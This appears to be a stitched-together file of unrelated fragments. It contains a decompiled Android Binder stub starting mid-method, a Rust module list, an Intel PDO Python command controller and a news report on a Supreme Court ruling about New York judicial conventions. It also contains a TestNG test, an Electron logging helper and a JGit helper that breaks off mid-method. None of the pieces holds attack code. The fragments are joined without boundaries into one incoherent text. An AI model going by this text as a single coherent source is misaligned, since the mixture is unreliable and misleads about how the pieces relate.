i, Parcel parcel, Parcel parcel2, int i2) { zzan com_google_android_gms_common_internal_zzan = null; C1330w a; switch (i) { case GoogleMap.MAP_TYPE_NORMAL /*1*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel.createStringArray(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case GoogleMap.MAP_TYPE_SATELLITE /*2*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case GoogleMap.MAP_TYPE_TERRAIN /*3*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case GoogleMap.MAP_TYPE_HYBRID /*4*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel2.writeNoException(); return true; case C1096c.MapAttrs_cameraZoom /*5*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_liteMode /*6*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiCompass /*7*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiRotateGestures /*8*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiScrollGestures /*9*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel.createStringArray(); parcel.readString(); parcel.readStrongBinder(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiTiltGestures /*10*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel.createStringArray(); parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiZoomControls /*11*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiZoomGestures /*12*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_useViewLifecycle /*13*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_zOrderOnTop /*14*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiMapToolbar /*15*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_ambientEnabled /*16*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_cameraMinZoomPreference /*17*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_cameraMaxZoomPreference /*18*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsSouthWestLatitude /*19*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readStrongBinder(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsSouthWestLongitude /*20*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.createStringArray(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsNorthEastLatitude /*21*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsNorthEastLongitude /*22*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_collapseContentDescription /*23*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_navigationIcon /*24*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_navigationContentDescription /*25*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_logoDescription /*26*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_titleTextColor /*27*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_subtitleTextColor /*28*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeSplitBackground /*30*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel.createStringArray(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeCloseDrawable /*31*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case AdSize.LANDSCAPE_AD_HEIGHT /*32*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeCopyDrawable /*33*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel.readString(); parcel.createStringArray(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModePasteDrawable /*34*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeSelectAllDrawable /*35*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeShareDrawable /*36*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeFindDrawable /*37*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeWebSearchDrawable /*38*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_textAppearanceLargePopupMenu /*40*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_textAppearanceSmallPopupMenu /*41*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_textAppearancePopupMenuHeader /*42*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_dialogTheme /*43*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_dialogPreferredPadding /*44*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_listDividerAlertDialog /*45*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionDropDownStyle /*46*/: zzj com_google_android_gms_common_internal_zzj; parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); a = C1331a.m4721a(parcel.readStrongBinder()); if (parcel.readInt() != 0) { com_google_android_gms_common_internal_zzj = (zzj) zzj.CREATOR.createFromParcel(parcel); } m4859a(a, com_google_android_gms_common_internal_zzj); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_dropdownListPreferredItemHeight /*47*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); a = C1331a.m4721a(parcel.readStrongBinder()); if (parcel.readInt() != 0) { com_google_android_gms_common_internal_zzan = (zzan) zzan.CREATOR.createFromParcel(parcel); } m4858a(a, com_google_android_gms_common_internal_zzan); parcel2.writeNoException(); return true; case 1598968902: parcel2.writeString("com.google.android.gms.common.internal.IGmsServiceBroker"); return true; default: return super.onTransact(i, parcel, parcel2, i2); } } } void m4858a(C1330w c1330w, zzan com_google_android_gms_common_internal_zzan); void m4859a(C1330w c1330w, zzj com_google_android_gms_common_internal_zzj); }
#![feature(int_error_matching)] mod syntax; pub mod client; pub mod header; pub mod method; pub mod protocol; pub mod reason; pub mod request; pub mod response; pub mod server; pub mod session; pub mod status; pub mod uri; pub use rtsp_common::version;
# Copyright 2018 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os, sys import logging import argparse import copy import cmd import shlex import time import random import re from string import Template logger = logging.getLogger(__name__) __all__ = ['ContractController'] from pdo.client.controller.commands import * from pdo.common.utility import find_file_in_path # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX class State(object) : """ """ # -------------------------------------------------- def __init__(self, config) : self.__data__ = copy.deepcopy(config) # -------------------------------------------------- def set(self, keylist, value) : assert keylist current = self.__data__ for key in keylist[:-1] : if key not in current : current[key] = {} current = current[key] current[keylist[-1]] = value # -------------------------------------------------- def get(self, keylist, value=None) : assert keylist current = self.__data__ for key in keylist : if key not in current : return value current = current[key] return current # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX class Bindings(object) : """ """ # -------------------------------------------------- def __init__(self, bindings = {}) : self.__bindings__ = copy.copy(bindings) # -------------------------------------------------- def bind(self, variable, value) : self.__bindings__[variable] = value # -------------------------------------------------- def isbound(self, variable) : return variable in self.__bindings__ # -------------------------------------------------- def expand(self, argstring) : try : template = Template(argstring) return template.substitute(self.__bindings__) except KeyError as ke : print('missing index variable {0}'.format(ke)) return '-h' # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # CLASS: ContractController # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX class ContractController(cmd.Cmd) : """ ContractController -- base class for building contract controllers Class defines the following variables: """ # ----------------------------------------------------------------- @staticmethod def ProcessScript(controller, filename, echo=False) : """ ProcessScript -- process a file containing commands for the controller """ saved = controller.echo try : controller.echo = echo cmdlines = ContractController.ParseScriptFile(filename) for cmdline in cmdlines : if controller.onecmd(cmdline) : return False except Exception as e : controller.echo = saved raise e controller.echo = saved return True # ----------------------------------------------------------------- @staticmethod def ParseScriptFile(filename) : cpattern = re.compile('##.*$') with open(filename) as fp : lines = fp.readlines() cmdlines = [] for line in lines : line = re.sub(cpattern, '', line.strip()) if len(line) > 0 : cmdlines.append(line) return cmdlines # ----------------------------------------------------------------- def __init__(self, config) : cmd.Cmd.__init__(self) self.echo = False self.bindings = Bindings(config.get('Bindings',{})) self.state = State(config) name = self.state.get(['Client', 'Identity'], "") self.prompt = "{0}> ".format(name) # ----------------------------------------------------------------- def precmd(self, line) : if self.echo: print(line) return line # ----------------------------------------------------------------- def postcmd(self, flag, line) : return flag # ================================================================= # STOCK COMMANDS # ================================================================= # ----------------------------------------------------------------- def do_sleep(self, args) : """ sleep <seconds> -- command to pause processing for a time (seconds). """ pargs = shlex.split(self.bindings.expand(args)) if len(pargs) == 0 : print('Time to sleep required: sleep <seconds>') return try : tm = int(pargs[0]) print("Sleeping for {} seconds".format(tm)) time.sleep(tm) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_set(self, args) : """ set -- assign a value to a symbol that can be retrieved with a $expansion """ pargs = shlex.split(self.bindings.expand(args)) try : parser = argparse.ArgumentParser(prog='set') parser.add_argument('-q', '--quiet', help='suppress printing the result', action='store_true') parser.add_argument('-s', '--symbol', help='symbol in which to store the identifier', required=True) parser.add_argument('-c', '--conditional', help='set the value only if it is undefined', action='store_true') eparser = parser.add_mutually_exclusive_group(required=True) eparser.add_argument('-i', '--identity', help='identity to use for retrieving public keys') eparser.add_argument('-f', '--file', help='name of the file to read for the value') eparser.add_argument('-v', '--value', help='string value to associate with the symbol') options = parser.parse_args(pargs) if options.conditional and self.bindings.isbound(options.symbol) : return value = options.value if options.identity : keypath = self.state.get(['Key', 'SearchPath']) keyfile = find_file_in_path("{0}_public.pem".format(options.identity), keypath) with open (keyfile, "r") as myfile: value = myfile.read() if options.file : with open (options.file, "r") as myfile: value = myfile.read() self.bindings.bind(options.symbol,value) if not options.quiet : print("${} = {}".format(options.symbol, value)) return except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_echo(self, args) : """ echo -- expand local $symbols """ print(self.bindings.expand(args)) # ----------------------------------------------------------------- def do_identity(self, args) : """ identity -- set the identity and keys to use for transactions """ pargs = shlex.split(self.bindings.expand(args)) try : parser = argparse.ArgumentParser(prog='identity') parser.add_argument('-n', '--name', help='identity to use for transactions', type=str, required=True) parser.add_argument('-f', '--key-file', help='file that contains the private key used for signing', type=str) options = parser.parse_args(pargs) self.prompt = "{0}> ".format(options.name) self.state.set(['Client', 'Identity'], options.name) self.state.set(['Key', 'FileName'], "{0}_private.pem".format(options.name)) if options.key_file : self.state.set(['Key', 'FileName'], options.key_file) return except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_load_plugin(self, args) : """ load -- load a new command processor from a file, the file should define a function called load_commands """ pargs = shlex.split(self.bindings.expand(args)) try : parser = argparse.ArgumentParser(prog='load_plugin') group = parser.add_mutually_exclusive_group(required=True) group.add_argument('-c', '--contract-class', help='load contract plugin from data directory', type=str) group.add_argument('-f', '--file', help='file from which to read the plugin', type=str) options = parser.parse_args(pargs) if options.file : plugin_file = options.file if options.contract_class : contract_paths = self.state.get(['Contract', 'SourceSearchPath'], ['.']) plugin_file = find_file_in_path(options.contract_class + '.py', contract_paths) with open(plugin_file) as f: code = compile(f.read(), plugin_file, 'exec') exec(code, globals()) load_commands(ContractController) return except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_script(self, args) : """ script -- load commands from a file """ pargs = shlex.split(self.bindings.expand(args)) try : parser = argparse.ArgumentParser(prog='script') parser.add_argument('-f', '--file', help='file from which to read commands', required=True) parser.add_argument('-e', '--echo', help='turn on command echoing', action='store_true') options = parser.parse_args(pargs) ContractController.ProcessScript(self, options.file, options.echo) return except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ================================================================= # CONTRACT COMMANDS # ================================================================= # ----------------------------------------------------------------- def do_pservice(self, args) : """ pservice -- manage provisioning service list """ pargs = shlex.split(self.bindings.expand(args)) try : pservice(self.state, self.bindings, pargs) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_eservice(self, args) : """ eservice -- manage enclave service list """ pargs = shlex.split(self.bindings.expand(args)) try : eservice(self.state, self.bindings, pargs) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_contract(self, args) : """ contract -- load contract for use """ pargs = shlex.split(self.bindings.expand(args)) try : contract(self.state, self.bindings, pargs) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_create(self, args) : """ create -- create a contract """ pargs = shlex.split(self.bindings.expand(args)) try : create(self.state, self.bindings, pargs) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_send(self, args) : """ send -- send a message to the contract """ pargs = shlex.split(self.bindings.expand(args)) try : send(self.state, self.bindings, pargs) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # ----------------------------------------------------------------- def do_get_public_key(self, args) : """ get_public_key -- get the public key from the current contract """ pargs = shlex.split(self.bindings.expand(args)) try : GetPublicKey.GetPublicKey(self, pargs) except SystemExit as se : if se.code > 0 : print('An error occurred processing {0}: {1}'.format(args, str(se))) return except Exception as e : print('An error occurred processing {0}: {1}'.format(args, str(e))) return # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # ----------------------------------------------------------------- def do_exit(self, args) : """ exit -- shutdown the simulator and exit the command loop """ return True # ----------------------------------------------------------------- def do_EOF(self, args) : """ exit -- shutdown the simulator and exit the command loop """ return True
The lower court rulings that were voided by the justices on Wednesday had barred the New York State Board of Elections from using the judicial convention system, directing the board to hold primaries instead, until the State Legislature could set up a new selection system. The high court’s rejection of those decrees was not a surprise, given that when the case was argued last Oct. 3, several justices voiced skepticism of the lower courts’ conclusions. The lower courts had ruled that picking State Supreme Court nominees by party convention violated the First Amendment right of political association by excluding not only the voters but also judicial candidates who are not anointed by party elders from the process. The high court found instead that the Constitution cut the other way, in favor of the state system. “A political party has a First Amendment right to limit its membership as it wishes and to choose a candidate-selection process that will in its view produce the nominee who best represents its political platform,” Justice Scalia wrote. He noted that nothing prevents people with judicial aspirations from wooing party leaders. Nor does anything compel the delegates chosen in party primaries in each assembly district to vote the way the party leaders desire, although they almost always do. Judicial aspirants are free to try to persuade the delegates to vote for them. And if they cannot persuade the delegates, they are free to try to gather the necessary signatures (generally several thousand, depending on the district) to get their names on the ballots despite the lack of party backing, Justice Scalia noted. “Selection by convention has been a traditional means of choosing party nominees,” Justice Scalia wrote. “While a state may determine it is not desirable and replace it, it is not unconstitutional.” Theodore B. Olson, the lawyer for the New York State Board of Elections who argued in favor of the convention system before the justices, told them the state had adopted the convention system decades ago, after experience with party primaries “spawned unseemly, expensive, and potentially corrupting fund-raising by judicial candidates.” Advertisement Continue reading the main story Justice Scalia and the other members of the high court were not persuaded by arguments that “one-party rule” effectively denied some people “a fair shot” at a judicial nomination. “The reason one-party rule is entrenched may be (and usually is) that voters approve of the positions and candidates that the party regularly puts forward,” Justice Scalia wrote. Andrew Rossman, a New York City lawyer who argued the case on behalf of the Democratic Party with Mr. Olson, called the ruling “a victory for the judiciary of New York” and said it would foster “a better and more independent judiciary.” But Frederick A. O. Schwarz Jr., who defended the lower courts’ findings before the justices, said that since the present system began in 1921, “New York has compiled an 87-year record of anti-democratic exclusion, unaccountability and corruption in judicial selection.” Mr. Schwarz said he still hoped for legislation that would end the convention method. Judge Torres herself said it was clear that, despite the outcome, “the Supreme Court’s decision should not, by any means, be read as endorsing New York’s flawed system.” The suit that led to Wednesday’s ruling was begun in 2004, following scandals in Brooklyn, where allegations of bribery, corruption and cronyism cast an unflattering spotlight on the way judges are picked. On Jan. 27, 2006, Federal Judge John Gleeson of Brooklyn declared the selection system “opaque and undemocratic” and said it violated the rights of voters. Justice Anthony M. Kennedy, joined by Justice Stephen G. Breyer, wrote separately to express the hope that better ways of picking jurists will evolve, and to emphasize their concern over the shabby clubhouse practices that sometimes accompany the process now. “Even in flawed election systems, there emerge brave and honorable judges who exemplify the law’s ideals,” Justice Kennedy wrote. “But it is unfair to them and to the concept of judicial independence if the state is indifferent to a selection process open to manipulation, criticism and serious abuse.” And Justice John Paul Stevens, joined by Justice David H. Souter, wrote that there was a distinction “between constitutionality and wise policy,” and that they did not necessarily disagree with the lower courts’ findings of “glaring deficiencies” in the present system, despite its embrace by state lawmakers. Advertisement Continue reading the main story But, Justice Stevens concluded, “as I recall my esteemed former colleague, Thurgood Marshall, remarking on numerous occasions: ‘The Constitution does not prohibit legislatures from enacting stupid laws.’ ”
/** * This class * * @author Cedric Beust, Jul 22, 2004 * */ public class ParameterTest extends BaseTest { // @Configuration(beforeTestMethod = true) // public void methodSetUp() { // m_testRunner.setClasses(new Class[] { test.ParameterTest.class }); // } public static void ppp(String s) { System.out.println("[ParameterTest] " + s); } @Test public void stringSingle() { addClass("test.parameters.ParameterSample"); setParameter("first-name", "Cedric"); addIncludedGroup("singleString"); run(); String[] passed = { "testSingleString", "testSingleStringDeprecated", }; String[] failed = { }; verifyTests("Passed", passed, getPassedTests()); verifyTests("Failed", failed, getFailedTests()); } }
import log from 'electron-log'; import { Topic } from '@shared/constants/topic'; import { getStore } from '@shared/store'; import type { LogData } from '@shared/types'; import type { MatchResult } from './utils'; const store = getStore(); /** * 负责将整理过的日志信息向外广播 * @param type * @param source */ export function logManager( type: 'box' | 'state', source: MatchResult[] | null ) { if (source && source.length) { source.forEach((item) => { const result = item.feature?.getResult?.(item.line); const data: LogData = { type, date: item.date, state: item.state, original: item.line?.original, result, }; log.info(data); store.dispatch<Topic.FLOW>({ type: Topic.FLOW, payload: data, }); }); } }
<reponame>zh1614933/Paste-Images-as-Base64Str package org.herry.pic.helper; import java.io.File; import java.io.IOException; import java.util.Set; import org.eclipse.jgit.api.AddCommand; import org.eclipse.jgit.api.Git; import org.eclipse.jgit.api.RmCommand; import org.eclipse.jgit.api.Status; import org.eclipse.jgit.api.errors.GitAPIException; import org.eclipse.jgit.internal.storage.file.FileRepository; import org.eclipse.jgit.transport.UsernamePasswordCredentialsProvider; /** * @author zhangheng * @date 2020/4/5 11:05 */ public class GgitOperate { //定义本地git路径 public static final String LOCALPATH = "D:/git_home/demo/"; //.git文件路径 public static final String LOCALGITFILE = LOCALPATH + ".git"; //远程仓库地址 public static final String REMOTEREPOURI = "https://gitee.com/zhanghenry007/md-pic.git"; //操作git的用户名 public static final String USER = "<EMAIL>"; //密码 public static final String PASSWORD = "***"; //建立与远程仓库的联系,仅需要执行一次 public static String setupRepo() { String msg = ""; try { Git git = Git.cloneRepository() .setURI(REMOTEREPOURI) .setCredentialsProvider(new UsernamePasswordCredentialsProvider(USER, PASSWORD)) .setBranch("master") .setDirectory(new File(LOCALPATH)).call(); msg = "git init success!"; } catch (Exception e) { msg = "git已经初始化!"; } return msg; } //pull拉取远程仓库文件 public static boolean pullBranchToLocal(){ boolean resultFlag = false; //git仓库地址 Git git; try { git = new Git(new FileRepository(LOCALGITFILE)); git.pull().setRemoteBranchName("master") .setCredentialsProvider(new UsernamePasswordCredentialsProvider(USER,PASSWORD)).call(); resultFlag = true; } catch (IOException | GitAPIException e) { e.printStackTrace(); } return resultFlag; } //提交git public static boolean commitFiles() { Git git = null; try { git = Git.open(new File(LOCALGITFILE)); AddCommand addCommand = git.add(); //add操作 add -A操作在jgit不知道怎么用 没有尝试出来 